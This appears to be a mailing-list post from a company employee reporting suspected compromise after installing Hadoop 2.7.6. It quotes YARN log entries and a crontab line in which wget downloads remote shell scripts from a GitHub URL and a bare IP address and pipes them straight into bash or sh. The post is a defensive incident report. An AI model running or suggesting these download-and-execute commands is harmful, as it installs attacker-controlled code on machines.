Dear all, we downloaded
http://www.apache.org/dyn/closer.cgi/hadoop/common/hadoop-2.7.6/hadoop-2.7.6.tar.gz
and install the unpacked files as described. The md5 check was correct.
After few days we found in the log files of YARN following entries:
2018-06-29 05:37:21,490 INFO
org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher:
Command to launch container container_1530169168373_1580_01_000001 :
wget -q -O -
https://raw.githubusercontent.com/zzgamond1/mygit/master/zz.sh | bash
... 2018-06-29 05:39:54,152 INFO
org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher:
Command to launch container container_1530169168373_1583_01_000001 :
wget -q -O -
https://raw.githubusercontent.com/zzgamond1/mygit/master/zz.sh | bash &
disown In the crontab we found following single entry: * * * * * wget -q
-O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1 We installed
hadoop 2.7.6 on two seperate machines and get the same behaviour. This
all looks like a trojaner is working. What do you say to this issue?
Mit freundlichen Grüßen / Kind regards,
Cliff Mattern
--
Clifford Mattern
AlphaCarina Software GmbH
Taunusturm 18.OG
Taunustor 1
60310 Frankfurt am Main
Tel.: +49 (0)69 24 43 42-4395
Fax: +49 (0)69 24 43 42-4150
e-Mail: clifford.matt...@alphacarina.de
Internet: https://alphacarina.de/
HRB Nr. 2339 • Handelsregister Deggendorf
Geschäftsführer: Dipl.-Inf. Stephan Iglhaut